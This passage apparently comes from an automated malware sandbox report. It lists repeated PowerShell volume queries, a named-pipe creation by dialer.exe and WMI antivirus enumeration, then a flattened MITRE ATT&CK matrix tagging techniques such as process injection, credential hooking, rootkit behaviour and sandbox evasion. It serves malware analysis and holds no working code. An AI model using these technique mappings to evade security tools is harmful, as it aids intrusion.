                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\dialer.exeCode function: 4_2_00007FF78AB31C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,4_2_00007FF78AB31C64
                Source: C:\Windows\System32\winlogon.exeCode function: 7_2_00000225DC647A40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_00000225DC647A40
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Windows Management Instrumentation
                11
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                1
                Disable or Modify Tools
                1
                Credential API Hooking
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Native API
                1
                Windows Service
                11
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                LSASS Memory1
                File and Directory Discovery
                Remote Desktop Protocol1
                Credential API Hooking
                Junk DataExfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                Command and Scripting Interpreter
                Logon Script (Windows)1
                Access Token Manipulation
                1
                Obfuscated Files or Information
                Security Account Manager22
                System Information Discovery
                SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts1
                PowerShell
                Login Hook1
                Windows Service
                1
                Install Root Certificate
                NTDS231
                Security Software Discovery
                Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script813
                Process Injection
                11
                DLL Side-Loading
                LSA Secrets2
                Process Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Rootkit
                Cached Domain Credentials21
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Modify Registry
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Virtualization/Sandbox Evasion
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                Access Token Manipulation
                Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd813
                Process Injection
                Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
